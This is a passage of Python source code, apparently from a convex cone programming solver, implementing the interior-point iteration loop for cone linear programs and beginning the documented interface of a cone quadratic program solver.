# [ vx ] [ 0 ] [ 0 A' G' c ] [ ux ]
# [ vy ] [ 0 ] [-A 0 0 b ] [ uy ]
# [ vz ] += [ W'*us ] - [-G 0 0 h ] [ W^{-1}*uz ]
# [ vtau ] [ dg*ukappa ] [-c' -b' -h' 0 ] [ utau/dg ]
#
# vs += lmbda o (dz + ds)
# vkappa += lmbdg * (dtau + dkappa).
ws3, wz3 = matrix(0.0, (cdim,1)), matrix(0.0, (cdim,1))
def res(ux, uy, uz, utau, us, ukappa, vx, vy, vz, vtau, vs, vkappa, W,
dg, lmbda):
# vx := vx - A'*uy - G'*W^{-1}*uz - c*utau/dg
Af(uy, vx, alpha = -1.0, beta = 1.0, trans = 'T')
blas.copy(uz, wz3)
misc.scale(wz3, W, inverse = 'I')
Gf(wz3, vx, alpha = -1.0, beta = 1.0, trans = 'T')
xaxpy(c, vx, alpha = -utau[0]/dg)
# vy := vy + A*ux - b*utau/dg
Af(ux, vy, alpha = 1.0, beta = 1.0)
yaxpy(b, vy, alpha = -utau[0]/dg)
# vz := vz + G*ux - h*utau/dg + W'*us
Gf(ux, vz, alpha = 1.0, beta = 1.0)
blas.axpy(h, vz, alpha = -utau[0]/dg)
blas.copy(us, ws3)
misc.scale(ws3, W, trans = 'T')
blas.axpy(ws3, vz)
# vtau := vtau + c'*ux + b'*uy + h'*W^{-1}*uz + dg*ukappa
vtau[0] += dg*ukappa[0] + xdot(c,ux) + ydot(b,uy) + \
misc.sdot(h, wz3, dims)
# vs := vs + lmbda o (uz + us)
blas.copy(us, ws3)
blas.axpy(uz, ws3)
misc.sprod(ws3, lmbda, dims, diag = 'D')
blas.axpy(ws3, vs)
# vkappa += vkappa + lmbdag * (utau + ukappa)
vkappa[0] += lmbda[-1] * (utau[0] + ukappa[0])
if xnewcopy is None: xnewcopy = matrix
if xdot is None: xdot = blas.dot
if xaxpy is None: xaxpy = blas.axpy
if xscal is None: xscal = blas.scal
def xcopy(x, y):
xscal(0.0, y)
xaxpy(x, y)
if ynewcopy is None: ynewcopy = matrix
if ydot is None: ydot = blas.dot
if yaxpy is None: yaxpy = blas.axpy
if yscal is None: yscal = blas.scal
def ycopy(x, y):
yscal(0.0, y)
yaxpy(x, y)
resx0 = max(1.0, math.sqrt(xdot(c,c)))
resy0 = max(1.0, math.sqrt(ydot(b,b)))
resz0 = max(1.0, misc.snrm2(h, dims))
# Select initial points.
x = xnewcopy(c); xscal(0.0, x)
y = ynewcopy(b); yscal(0.0, y)
s, z = matrix(0.0, (cdim,1)), matrix(0.0, (cdim,1))
dx, dy = xnewcopy(c), ynewcopy(b)
ds, dz = matrix(0.0, (cdim,1)), matrix(0.0, (cdim,1))
dkappa, dtau = matrix(0.0, (1,1)), matrix(0.0, (1,1))
if primalstart is None or dualstart is None:
# Factor
#
# [ 0 A' G' ]
# [ A 0 0 ].
# [ G 0 -I ]
W = {}
W['d'] = matrix(1.0, (dims['l'], 1))
W['di'] = matrix(1.0, (dims['l'], 1))
W['v'] = [ matrix(0.0, (m,1)) for m in dims['q'] ]
W['beta'] = len(dims['q']) * [ 1.0 ]
for v in W['v']: v[0] = 1.0
W['r'] = [ matrix(0.0, (m,m)) for m in dims['s'] ]
W['rti'] = [ matrix(0.0, (m,m)) for m in dims['s'] ]
for r in W['r']: r[::r.size[0]+1 ] = 1.0
for rti in W['rti']: rti[::rti.size[0]+1 ] = 1.0
try: f = kktsolver(W)
except ArithmeticError:
raise ValueError("Rank(A) < p or Rank([G; A]) < n")
if primalstart is None:
# minimize || G * x - h ||^2
# subject to A * x = b
#
# by solving
#
# [ 0 A' G' ] [ x ] [ 0 ]
# [ A 0 0 ] * [ dy ] = [ b ].
# [ G 0 -I ] [ -s ] [ h ]
xscal(0.0, x)
ycopy(b, dy)
blas.copy(h, s)
try: f(x, dy, s)
except ArithmeticError:
raise ValueError("Rank(A) < p or Rank([G; A]) < n")
blas.scal(-1.0, s)
else:
xcopy(primalstart['x'], x)
blas.copy(primalstart['s'], s)
# ts = min{ t | s + t*e >= 0 }
ts = misc.max_step(s, dims)
if ts >= 0 and primalstart:
raise ValueError("initial s is not positive")
if dualstart is None:
# minimize || z ||^2
# subject to G'*z + A'*y + c = 0
#
# by solving
#
# [ 0 A' G' ] [ dx ] [ -c ]
# [ A 0 0 ] [ y ] = [ 0 ].
# [ G 0 -I ] [ z ] [ 0 ]
xcopy(c, dx);
xscal(-1.0, dx)
yscal(0.0, y)
blas.scal(0.0, z)
try: f(dx, y, z)
except ArithmeticError:
raise ValueError("Rank(A) < p or Rank([G; A]) < n")
else:
if 'y' in dualstart: ycopy(dualstart['y'], y)
blas.copy(dualstart['z'], z)
# tz = min{ t | z + t*e >= 0 }
tz = misc.max_step(z, dims)
if tz >= 0 and dualstart:
raise ValueError("initial z is not positive")
nrms = misc.snrm2(s, dims)
nrmz = misc.snrm2(z, dims)
if primalstart is None and dualstart is None:
gap = misc.sdot(s, z, dims)
pcost = xdot(c,x)
dcost = -ydot(b,y) - misc.sdot(h, z, dims)
if pcost < 0.0:
relgap = gap / -pcost
elif dcost > 0.0:
relgap = gap / dcost
else:
relgap = None
if (ts <= 0 and tz <= 0 and (gap <= ABSTOL or ( relgap is not None
and relgap <= RELTOL ))) and KKTREG is None:
# The initial points we constructed happen to be feasible and
# optimal.
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
misc.symm(s, m, ind)
misc.symm(z, m, ind)
ind += m**2
# rx = A'*y + G'*z + c
rx = xnewcopy(c)
Af(y, rx, beta = 1.0, trans = 'T')
Gf(z, rx, beta = 1.0, trans = 'T')
resx = math.sqrt( xdot(rx, rx) )
# ry = b - A*x
ry = ynewcopy(b)
Af(x, ry, alpha = -1.0, beta = 1.0)
resy = math.sqrt( ydot(ry, ry) )
# rz = s + G*x - h
rz = matrix(0.0, (cdim,1))
Gf(x, rz)
blas.axpy(s, rz)
blas.axpy(h, rz, alpha = -1.0)
resz = misc.snrm2(rz, dims)
pres = max(resy/resy0, resz/resz0)
dres = resx/resx0
cx, by, hz = xdot(c,x), ydot(b,y), misc.sdot(h, z, dims)
if show_progress:
print("Optimal solution found.")
return { 'x': x, 'y': y, 's': s, 'z': z,
'status': 'optimal',
'gap': gap,
'relative gap': relgap,
'primal objective': cx,
'dual objective': -(by + hz),
'primal infeasibility': pres,
'primal slack': -ts,
'dual slack': -tz,
'dual infeasibility': dres,
'residual as primal infeasibility certificate': None,
'residual as dual infeasibility certificate': None,
'iterations': 0 }
if ts >= -1e-8 * max(nrms, 1.0):
a = 1.0 + ts
s[:dims['l']] += a
s[indq[:-1]] += a
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
s[ind : ind+m*m : m+1] += a
ind += m**2
if tz >= -1e-8 * max(nrmz, 1.0):
a = 1.0 + tz
z[:dims['l']] += a
z[indq[:-1]] += a
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
z[ind : ind+m*m : m+1] += a
ind += m**2
elif primalstart is None and dualstart is not None:
if ts >= -1e-8 * max(nrms, 1.0):
a = 1.0 + ts
s[:dims['l']] += a
s[indq[:-1]] += a
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
s[ind : ind+m*m : m+1] += a
ind += m**2
elif primalstart is not None and dualstart is None:
if tz >= -1e-8 * max(nrmz, 1.0):
a = 1.0 + tz
z[:dims['l']] += a
z[indq[:-1]] += a
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
z[ind : ind+m*m : m+1] += a
ind += m**2
tau, kappa = 1.0, 1.0
rx, hrx = xnewcopy(c), xnewcopy(c)
ry, hry = ynewcopy(b), ynewcopy(b)
rz, hrz = matrix(0.0, (cdim,1)), matrix(0.0, (cdim,1))
sigs = matrix(0.0, (sum(dims['s']), 1))
sigz = matrix(0.0, (sum(dims['s']), 1))
lmbda = matrix(0.0, (cdim_diag + 1, 1))
lmbdasq = matrix(0.0, (cdim_diag + 1, 1))
gap = misc.sdot(s, z, dims)
for iters in range(MAXITERS+1):
# hrx = -A'*y - G'*z
Af(y, hrx, alpha = -1.0, trans = 'T')
Gf(z, hrx, alpha = -1.0, beta = 1.0, trans = 'T')
hresx = math.sqrt( xdot(hrx, hrx) )
# rx = hrx - c*tau
# = -A'*y - G'*z - c*tau
xcopy(hrx, rx)
xaxpy(c, rx, alpha = -tau)
resx = math.sqrt( xdot(rx, rx) ) / tau
# hry = A*x
Af(x, hry)
hresy = math.sqrt( ydot(hry, hry) )
# ry = hry - b*tau
# = A*x - b*tau
ycopy(hry, ry)
yaxpy(b, ry, alpha = -tau)
resy = math.sqrt( ydot(ry, ry) ) / tau
# hrz = s + G*x
Gf(x, hrz)
blas.axpy(s, hrz)
hresz = misc.snrm2(hrz, dims)
# rz = hrz - h*tau
# = s + G*x - h*tau
blas.scal(0, rz)
blas.axpy(hrz, rz)
blas.axpy(h, rz, alpha = -tau)
resz = misc.snrm2(rz, dims) / tau
# rt = kappa + c'*x + b'*y + h'*z
cx, by, hz = xdot(c,x), ydot(b,y), misc.sdot(h, z, dims)
rt = kappa + cx + by + hz
# Statistics for stopping criteria.
pcost, dcost = cx / tau, -(by + hz) / tau
if pcost < 0.0:
relgap = gap / -pcost
elif dcost > 0.0:
relgap = gap / dcost
else:
relgap = None
pres = max(resy/resy0, resz/resz0)
dres = resx/resx0
if hz + by < 0.0:
pinfres = hresx / resx0 / (-hz - by)
else:
pinfres = None
if cx < 0.0:
dinfres = max(hresy / resy0, hresz/resz0) / (-cx)
else:
dinfres = None
if show_progress:
if iters == 0:
print("% 10s% 12s% 10s% 8s% 7s % 5s" %("pcost", "dcost",
"gap", "pres", "dres", "k/t"))
print("%2d: % 8.4e % 8.4e % 4.0e% 7.0e% 7.0e% 7.0e" \
%(iters, pcost, dcost, gap, pres, dres, kappa/tau))
if ( pres <= FEASTOL and dres <= FEASTOL and ( gap <= ABSTOL or
(relgap is not None and relgap <= RELTOL) ) ) or \
iters == MAXITERS:
xscal(1.0/tau, x)
yscal(1.0/tau, y)
blas.scal(1.0/tau, s)
blas.scal(1.0/tau, z)
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
misc.symm(s, m, ind)
misc.symm(z, m, ind)
ind += m**2
ts = misc.max_step(s, dims)
tz = misc.max_step(z, dims)
if iters == MAXITERS:
if show_progress:
print("Terminated (maximum number of iterations "\
"reached).")
return { 'x': x, 'y': y, 's': s, 'z': z,
'status': 'unknown',
'gap': gap,
'relative gap': relgap,
'primal objective': pcost,
'dual objective' : dcost,
'primal infeasibility': pres,
'dual infeasibility': dres,
'primal slack': -ts,
'dual slack': -tz,
'residual as primal infeasibility certificate':
pinfres,
'residual as dual infeasibility certificate':
dinfres,
'iterations': iters}
else:
if show_progress:
print("Optimal solution found.")
return { 'x': x, 'y': y, 's': s, 'z': z,
'status': 'optimal',
'gap': gap,
'relative gap': relgap,
'primal objective': pcost,
'dual objective' : dcost,
'primal infeasibility': pres,
'dual infeasibility': dres,
'primal slack': -ts,
'dual slack': -tz,
'residual as primal infeasibility certificate': None,
'residual as dual infeasibility certificate': None,
'iterations': iters }
elif pinfres is not None and pinfres <= FEASTOL:
yscal(1.0/(-hz - by), y)
blas.scal(1.0/(-hz - by), z)
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
misc.symm(z, m, ind)
ind += m**2
tz = misc.max_step(z, dims)
if show_progress:
print("Certificate of primal infeasibility found.")
return { 'x': None, 'y': y, 's': None, 'z': z,
'status': 'primal infeasible',
'gap': None,
'relative gap': None,
'primal objective': None,
'dual objective' : 1.0,
'primal infeasibility': None,
'dual infeasibility': None,
'primal slack': None,
'dual slack': -tz,
'residual as primal infeasibility certificate': pinfres,
'residual as dual infeasibility certificate': None,
'iterations': iters }
elif dinfres is not None and dinfres <= FEASTOL:
xscal(1.0/(-cx), x)
blas.scal(1.0/(-cx), s)
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
misc.symm(s, m, ind)
ind += m**2
y, z = None, None
ts = misc.max_step(s, dims)
if show_progress:
print("Certificate of dual infeasibility found.")
return {'x': x, 'y': None, 's': s, 'z': None,
'status': 'dual infeasible',
'gap': None,
'relative gap': None,
'primal objective': -1.0,
'dual objective' : None,
'primal infeasibility': None,
'dual infeasibility': None,
'primal slack': -ts,
'dual slack': None,
'residual as primal infeasibility certificate': None,
'residual as dual infeasibility certificate': dinfres,
'iterations': iters }
# Compute initial scaling W:
#
# W * z = W^{-T} * s = lambda
# dg * tau = 1/dg * kappa = lambdag.
if iters == 0:
W = misc.compute_scaling(s, z, lmbda, dims, mnl = 0)
# dg = sqrt( kappa / tau )
# dgi = sqrt( tau / kappa )
# lambda_g = sqrt( tau * kappa )
#
# lambda_g is stored in the last position of lmbda.
dg = math.sqrt( kappa / tau )
dgi = math.sqrt( tau / kappa )
lmbda[-1] = math.sqrt( tau * kappa )
# lmbdasq := lmbda o lmbda
misc.ssqr(lmbdasq, lmbda, dims)
lmbdasq[-1] = lmbda[-1]**2
# f3(x, y, z) solves
#
# [ 0 A' G' ] [ ux ] [ bx ]
# [ A 0 0 ] [ uy ] = [ by ].
# [ G 0 -W'*W ] [ W^{-1}*uz ] [ bz ]
#
# On entry, x, y, z contain bx, by, bz.
# On exit, they contain ux, uy, uz.
#
# Also solve
#
# [ 0 A' G' ] [ x1 ] [ c ]
# [-A 0 0 ]*[ y1 ] = -dgi * [ b ].
# [-G 0 W'*W ] [ W^{-1}*z1 ] [ h ]
try:
f3 = kktsolver(W)
if iters == 0:
x1, y1 = xnewcopy(c), ynewcopy(b)
z1 = matrix(0.0, (cdim,1))
xcopy(c, x1); xscal(-1, x1)
ycopy(b, y1)
blas.copy(h, z1)
f3(x1, y1, z1)
xscal(dgi, x1)
yscal(dgi, y1)
blas.scal(dgi, z1)
except ArithmeticError:
if iters == 0 and primalstart and dualstart:
raise ValueError("Rank(A) < p or Rank([G; A]) < n")
else:
xscal(1.0/tau, x)
yscal(1.0/tau, y)
blas.scal(1.0/tau, s)
blas.scal(1.0/tau, z)
ind = dims['l'] + sum(dims['q'])
for m in dims['s']:
misc.symm(s, m, ind)
misc.symm(z, m, ind)
ind += m**2
ts = misc.max_step(s, dims)
tz = misc.max_step(z, dims)
if show_progress:
print("Terminated (singular KKT matrix).")
return { 'x': x, 'y': y, 's': s, 'z': z,
'status': 'unknown',
'gap': gap,
'relative gap': relgap,
'primal objective': pcost,
'dual objective' : dcost,
'primal infeasibility': pres,
'dual infeasibility': dres,
'primal slack': -ts,
'dual slack': -tz,
'residual as primal infeasibility certificate':
pinfres,
'residual as dual infeasibility certificate':
dinfres,
'iterations': iters }
# f6_no_ir(x, y, z, tau, s, kappa) solves
#
# [ 0 ] [ 0 A' G' c ] [ ux ] [ bx ]
# [ 0 ] [ -A 0 0 b ] [ uy ] [ by ]
# [ W'*us ] - [ -G 0 0 h ] [ W^{-1}*uz ] = -[ bz ]
# [ dg*ukappa ] [ -c' -b' -h' 0 ] [ utau/dg ] [ btau ]
#
# lmbda o (uz + us) = -bs
# lmbdag * (utau + ukappa) = -bkappa.
#
# On entry, x, y, z, tau, s, kappa contain bx, by, bz, btau,
# bkappa. On exit, they contain ux, uy, uz, utau, ukappa.
# th = W^{-T} * h
if iters == 0: th = matrix(0.0, (cdim,1))
blas.copy(h, th)
misc.scale(th, W, trans = 'T', inverse = 'I')
def f6_no_ir(x, y, z, tau, s, kappa):
# Solve
#
# [ 0 A' G' 0 ] [ ux ]
# [ -A 0 0 b ] [ uy ]
# [ -G 0 W'*W h ] [ W^{-1}*uz ]
# [ -c' -b' -h' k/t ] [ utau/dg ]
#
# [ bx ]
# [ by ]
# = [ bz - W'*(lmbda o\ bs) ]
# [ btau - bkappa/tau ]
#
# us = -lmbda o\ bs - uz
# ukappa = -bkappa/lmbdag - utau.
# First solve
#
# [ 0 A' G' ] [ ux ] [ bx ]
# [ A 0 0 ] [ uy ] = [ -by ]
# [ G 0 -W'*W ] [ W^{-1}*uz ] [ -bz + W'*(lmbda o\ bs) ]
# y := -y = -by
yscal(-1.0, y)
# s := -lmbda o\ s = -lmbda o\ bs
misc.sinv(s, lmbda, dims)
blas.scal(-1.0, s)
# z := -(z + W'*s) = -bz + W'*(lambda o\ bs)
blas.copy(s, ws3)
misc.scale(ws3, W, trans = 'T')
blas.axpy(ws3, z)
blas.scal(-1.0, z)
# Solve system.
f3(x, y, z)
# Combine with solution of
#
# [ 0 A' G' ] [ x1 ] [ c ]
# [-A 0 0 ] [ y1 ] = -dgi * [ b ]
# [-G 0 W'*W ] [ W^{-1}*dzl ] [ h ]
#
# to satisfy
#
# -c'*x - b'*y - h'*W^{-1}*z + dg*tau = btau - bkappa/tau.
# kappa[0] := -kappa[0] / lmbd[-1] = -bkappa / lmbdag
kappa[0] = -kappa[0] / lmbda[-1]
# tau[0] = tau[0] + kappa[0] / dgi = btau[0] - bkappa / tau
tau[0] += kappa[0] / dgi
tau[0] = dgi * ( tau[0] + xdot(c,x) + ydot(b,y) +
misc.sdot(th, z, dims) ) / (1.0 + misc.sdot(z1, z1, dims))
xaxpy(x1, x, alpha = tau[0])
yaxpy(y1, y, alpha = tau[0])
blas.axpy(z1, z, alpha = tau[0])
# s := s - z = - lambda o\ bs - z
blas.axpy(z, s, alpha = -1)
kappa[0] -= tau[0]
# f6(x, y, z, tau, s, kappa) solves the same system as f6_no_ir,
# but applies iterative refinement.
if iters == 0:
if refinement or DEBUG:
wx, wy = xnewcopy(c), ynewcopy(b)
wz, ws = matrix(0.0, (cdim, 1)), matrix(0.0, (cdim, 1))
wtau, wkappa = matrix(0.0), matrix(0.0)
if refinement:
wx2, wy2 = xnewcopy(c), ynewcopy(b)
wz2, ws2 = matrix(0.0, (cdim, 1)), matrix(0.0, (cdim, 1))
wtau2, wkappa2 = matrix(0.0), matrix(0.0)
def f6(x, y, z, tau, s, kappa):
if refinement or DEBUG:
xcopy(x, wx)
ycopy(y, wy)
blas.copy(z, wz)
wtau[0] = tau[0]
blas.copy(s, ws)
wkappa[0] = kappa[0]
f6_no_ir(x, y, z, tau, s, kappa)
for i in range(refinement):
xcopy(wx, wx2)
ycopy(wy, wy2)
blas.copy(wz, wz2)
wtau2[0] = wtau[0]
blas.copy(ws, ws2)
wkappa2[0] = wkappa[0]
res(x, y, z, tau, s, kappa, wx2, wy2, wz2, wtau2, ws2,
wkappa2, W, dg, lmbda)
f6_no_ir(wx2, wy2, wz2, wtau2, ws2, wkappa2)
xaxpy(wx2, x)
yaxpy(wy2, y)
blas.axpy(wz2, z)
tau[0] += wtau2[0]
blas.axpy(ws2, s)
kappa[0] += wkappa2[0]
if DEBUG:
res(x, y, z, tau, s, kappa, wx, wy, wz, wtau, ws, wkappa,
W, dg, lmbda)
print("KKT residuals")
print(" 'x': %e" %math.sqrt(xdot(wx, wx)))
print(" 'y': %e" %math.sqrt(ydot(wy, wy)))
print(" 'z': %e" %misc.snrm2(wz, dims))
print(" 'tau': %e" %abs(wtau[0]))
print(" 's': %e" %misc.snrm2(ws, dims))
print(" 'kappa': %e" %abs(wkappa[0]))
mu = blas.nrm2(lmbda)**2 / (1 + cdim_diag)
sigma = 0.0
for i in [0,1]:
# Solve
#
# [ 0 ] [ 0 A' G' c ] [ dx ]
# [ 0 ] [ -A 0 0 b ] [ dy ]
# [ W'*ds ] - [ -G 0 0 h ] [ W^{-1}*dz ]
# [ dg*dkappa ] [ -c' -b' -h' 0 ] [ dtau/dg ]
#
# [ rx ]
# [ ry ]
# = - (1-sigma) [ rz ]
# [ rtau ]
#
# lmbda o (dz + ds) = -lmbda o lmbda + sigma*mu*e
# lmbdag * (dtau + dkappa) = - kappa * tau + sigma*mu
# ds = -lmbdasq if i is 0
# = -lmbdasq - dsa o dza + sigma*mu*e if i is 1
# dkappa = -lambdasq[-1] if i is 0
# = -lambdasq[-1] - dkappaa*dtaua + sigma*mu if i is 1.
blas.copy(lmbdasq, ds, n = dims['l'] + sum(dims['q']))
ind = dims['l'] + sum(dims['q'])
ind2 = ind
blas.scal(0.0, ds, offset = ind)
for m in dims['s']:
blas.copy(lmbdasq, ds, n = m, offsetx = ind2,
offsety = ind, incy = m+1)
ind += m*m
ind2 += m
dkappa[0] = lmbdasq[-1]
if i == 1:
blas.axpy(ws3, ds)
ds[:dims['l']] -= sigma*mu
ds[indq[:-1]] -= sigma*mu
ind = dims['l'] + sum(dims['q'])
ind2 = ind
for m in dims['s']:
ds[ind : ind+m*m : m+1] -= sigma*mu
ind += m*m
dkappa[0] += wkappa3 - sigma*mu
# (dx, dy, dz, dtau) = (1-sigma)*(rx, ry, rz, rt)
xcopy(rx, dx); xscal(1.0 - sigma, dx)
ycopy(ry, dy); yscal(1.0 - sigma, dy)
blas.copy(rz, dz); blas.scal(1.0 - sigma, dz)
dtau[0] = (1.0 - sigma) * rt
f6(dx, dy, dz, dtau, ds, dkappa)
# Save ds o dz and dkappa * dtau for Mehrotra correction
if i == 0:
blas.copy(ds, ws3)
misc.sprod(ws3, dz, dims)
wkappa3 = dtau[0] * dkappa[0]
# Maximum step to boundary.
#
# If i is 1, also compute eigenvalue decomposition of the 's'
# blocks in ds, dz. The eigenvectors Qs, Qz are stored in
# dsk, dzk. The eigenvalues are stored in sigs, sigz.
misc.scale2(lmbda, ds, dims)
misc.scale2(lmbda, dz, dims)
if i == 0:
ts = misc.max_step(ds, dims)
tz = misc.max_step(dz, dims)
else:
ts = misc.max_step(ds, dims, sigma = sigs)
tz = misc.max_step(dz, dims, sigma = sigz)
tt = -dtau[0] / lmbda[-1]
tk = -dkappa[0] / lmbda[-1]
t = max([ 0.0, ts, tz, tt, tk ])
if t == 0.0:
step = 1.0
else:
if i == 0:
step = min(1.0, 1.0 / t)
else:
step = min(1.0, STEP / t)
if i == 0:
sigma = (1.0 - step)**EXPON
# Update x, y.
xaxpy(dx, x, alpha = step)
yaxpy(dy, y, alpha = step)
# Replace 'l' and 'q' blocks of ds and dz with the updated
# variables in the current scaling.
# Replace 's' blocks of ds and dz with the factors Ls, Lz in a
# factorization Ls*Ls', Lz*Lz' of the updated variables in the
# current scaling.
# ds := e + step*ds for 'l' and 'q' blocks.
# dz := e + step*dz for 'l' and 'q' blocks.
blas.scal(step, ds, n = dims['l'] + sum(dims['q']))
blas.scal(step, dz, n = dims['l'] + sum(dims['q']))
ds[:dims['l']] += 1.0
dz[:dims['l']] += 1.0
ds[indq[:-1]] += 1.0
dz[indq[:-1]] += 1.0
# ds := H(lambda)^{-1/2} * ds and dz := H(lambda)^{-1/2} * dz.
#
# This replaces the 'l' and 'q' components of ds and dz with the
# updated variables in the current scaling.
# The 's' components of ds and dz are replaced with
#
# diag(lmbda_k)^{1/2} * Qs * diag(lmbda_k)^{1/2}
# diag(lmbda_k)^{1/2} * Qz * diag(lmbda_k)^{1/2}
#
misc.scale2(lmbda, ds, dims, inverse = 'I')
misc.scale2(lmbda, dz, dims, inverse = 'I')
# sigs := ( e + step*sigs ) ./ lambda for 's' blocks.
# sigz := ( e + step*sigz ) ./ lambda for 's' blocks.
blas.scal(step, sigs)
blas.scal(step, sigz)
sigs += 1.0
sigz += 1.0
blas.tbsv(lmbda, sigs, n = sum(dims['s']), k = 0, ldA = 1,
offsetA = dims['l'] + sum(dims['q']))
blas.tbsv(lmbda, sigz, n = sum(dims['s']), k = 0, ldA = 1,
offsetA = dims['l'] + sum(dims['q']))
# dsk := Ls = dsk * sqrt(sigs).
# dzk := Lz = dzk * sqrt(sigz).
ind2, ind3 = dims['l'] + sum(dims['q']), 0
for k in range(len(dims['s'])):
m = dims['s'][k]
for i in range(m):
blas.scal(math.sqrt(sigs[ind3+i]), ds, offset = ind2 + m*i,
n = m)
blas.scal(math.sqrt(sigz[ind3+i]), dz, offset = ind2 + m*i,
n = m)
ind2 += m*m
ind3 += m
# Update lambda and scaling.
misc.update_scaling(W, lmbda, ds, dz)
# For kappa, tau block:
#
# dg := sqrt( (kappa + step*dkappa) / (tau + step*dtau) )
# = dg * sqrt( (1 - step*tk) / (1 - step*tt) )
#
# lmbda[-1] := sqrt((tau + step*dtau) * (kappa + step*dkappa))
# = lmbda[-1] * sqrt(( 1 - step*tt) * (1 - step*tk))
dg *= math.sqrt(1.0 - step*tk) / math.sqrt(1.0 - step*tt)
dgi = 1.0 / dg
lmbda[-1] *= math.sqrt(1.0 - step*tt) * math.sqrt(1.0 - step*tk)
# Unscale s, z, tau, kappa (unscaled variables are used only to
# compute feasibility residuals).
blas.copy(lmbda, s, n = dims['l'] + sum(dims['q']))
ind = dims['l'] + sum(dims['q'])
ind2 = ind
for m in dims['s']:
blas.scal(0.0, s, offset = ind2)
blas.copy(lmbda, s, offsetx = ind, offsety = ind2, n = m,
incy = m+1)
ind += m
ind2 += m*m
misc.scale(s, W, trans = 'T')
blas.copy(lmbda, z, n = dims['l'] + sum(dims['q']))
ind = dims['l'] + sum(dims['q'])
ind2 = ind
for m in dims['s']:
blas.scal(0.0, z, offset = ind2)
blas.copy(lmbda, z, offsetx = ind, offsety = ind2, n = m,
incy = m+1)
ind += m
ind2 += m*m
misc.scale(z, W, inverse = 'I')
kappa, tau = lmbda[-1]/dgi, lmbda[-1]*dgi
gap = ( blas.nrm2(lmbda, n = lmbda.size[0]-1) / tau )**2
def coneqp(P, q, G = None, h = None, dims = None, A = None, b = None,
initvals = None, kktsolver = None, xnewcopy = None, xdot = None,
xaxpy = None, xscal = None, ynewcopy = None, ydot = None, yaxpy = None,
yscal = None, **kwargs):
"""
Solves a pair of primal and dual convex quadratic cone programs
minimize (1/2)*x'*P*x + q'*x
subject to G*x + s = h
A*x = b
s >= 0
maximize -(1/2)*(q + G'*z + A'*y)' * pinv(P) * (q + G'*z + A'*y)
- h'*z - b'*y
subject to q + G'*z + A'*y in range(P)
z >= 0.
The inequalities are with respect to a cone C defined as the Cartesian
product of N + M + 1 cones:
C = C_0 x C_1 x .... x C_N x C_{N+1} x ... x C_{N+M}.
The first cone C_0 is the nonnegative orthant of dimension ml.
The next N cones are 2nd order cones of dimension mq[0], ..., mq[N-1].
The second order cone of dimension m is defined as
{ (u0, u1) in R x R^{m-1} | u0 >= ||u1||_2 }.
The next M cones are positive semidefinite cones of order ms[0], ...,
ms[M-1] >= 0.
Input arguments (basic usage).
P is a dense or sparse 'd' matrix of size (n,n) with the lower
triangular part of the Hessian of the objective stored in the
lower triangle. Must be positive semidefinite.
q is a dense 'd' matrix of size (n,1).
dims is a dictionary with the dimensions of the components of C.
It has three fields.
- dims['l'] = ml, the dimension of the nonnegative orthant C_0.
(ml >= 0.)
- dims['q'] = mq = [ mq[0], mq[1], ..., mq[N-1] ], a list of N
integers with the dimensions of the second order cones
C_1, ..., C_N. (N >= 0 and mq[k] >= 1.)
- dims['s'] = ms = [ ms[0], ms[1], ..., ms[M-1] ], a list of M
integers with the orders of the semidefinite cones
C_{N+1}, ..., C_{N+M}. (M >= 0 and ms[k] >= 0.)
The default value of dims = {'l': G.size[0], 'q': [], 's': []}.
G is a dense or sparse 'd' matrix of size (K,n), where
K = ml + mq[0] + ... + mq[N-1] + ms[0]**2 + ... + ms[M-1]**2.
Each column of G describes a vector
v = ( v_0, v_1, ..., v_N, vec(v_{N+1}), ..., vec(v_{N+M}) )
in V = R^ml x R^mq[0] x ... x R^mq[N-1] x S^ms[0] x ... x S^ms[M-1]
stored as a column vector
[ v_0; v_1; ...; v_N; vec(v_{N+1}); ...; vec(v_{N+M}) ].
Here, if u is a symmetric matrix of order m, then vec(u) is the
matrix u stored in column major order as a vector of length m**2.
We use BLAS unpacked 'L' storage, i.e., the entries in vec(u)
corresponding to the strictly upper triangular entries of u are
not referenced.
h is a dense 'd' matrix of size (K,1), representing a vector in V,
in the same format as the columns of G.
A is a dense or sparse 'd' matrix of size (p,n). The default
value is a sparse 'd' matrix of size (0,n).
b is a dense 'd' matrix of size (p,1). The default value is a
dense 'd' matrix of size (0,1).
initvals is a dictionary with optional primal and dual starting
points initvals['x'], initvals['s'], initvals['y'], initvals['z'].
- initvals['x'] is a dense 'd' matrix of size (n,1).
- initvals['s'] is a dense 'd' matrix of size (K,1), representing
a vector that is strictly positive with respect to the cone C.
- initvals['y'] is a dense 'd' matrix of size (p,1).
- initvals['z'] is a dense 'd' matrix of size (K,1), representing
a vector that is strictly positive with respect to the cone C.
A default initialization is used for the variables that are not
specified in initvals.
It is assumed that rank(A) = p and rank([P; A; G]) = n.
The other arguments are normally not needed. They make it possible
to exploit certain types of structure, as described below.
Output arguments.
Returns a dictionary with keys 'status', 'x', 's', 'z', 'y',
'primal objective', 'dual objective', 'gap', 'relative gap',
'primal infeasibility', 'dual infeasibility', 'primal slack',
'dual slack', 'iterations'.
The 'status' field has values 'optimal' or 'unknown'. 'iterations'
is the number of iterations taken.
If the status is 'optimal', 'x', 's', 'y', 'z' are an approximate
solution of the primal and dual optimality conditions
G*x + s = h, A*x = b
P*x + G'*z + A'*y + q = 0
s >= 0, z >= 0
s'*z = 0.
If the status is 'unknown', 'x', 'y', 's', 'z' are the last
iterates before termination. These satisfy s > 0 and z > 0,
but are not necessarily feasible.
The values of the other fields are defined as follows.
- 'primal objective': the primal objective (1/2)*x'*P*x + q'*x.
- 'dual objective': the dual objective
L(x,y,z) = (1/2)*x'*P*x + q'*x + z'*(G*x - h) + y'*(A*x-b).
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as
gap / -primal objective
if the primal objective is negative,
gap / dual objective
if the dual objective is positive, and None otherwise.
- 'primal infeasibility': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s + h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| P*x + G'*z + A'*y + q || / max(1, ||q||).
- 'primal slack': the smallest primal slack, sup {t | s >= t*e },
where
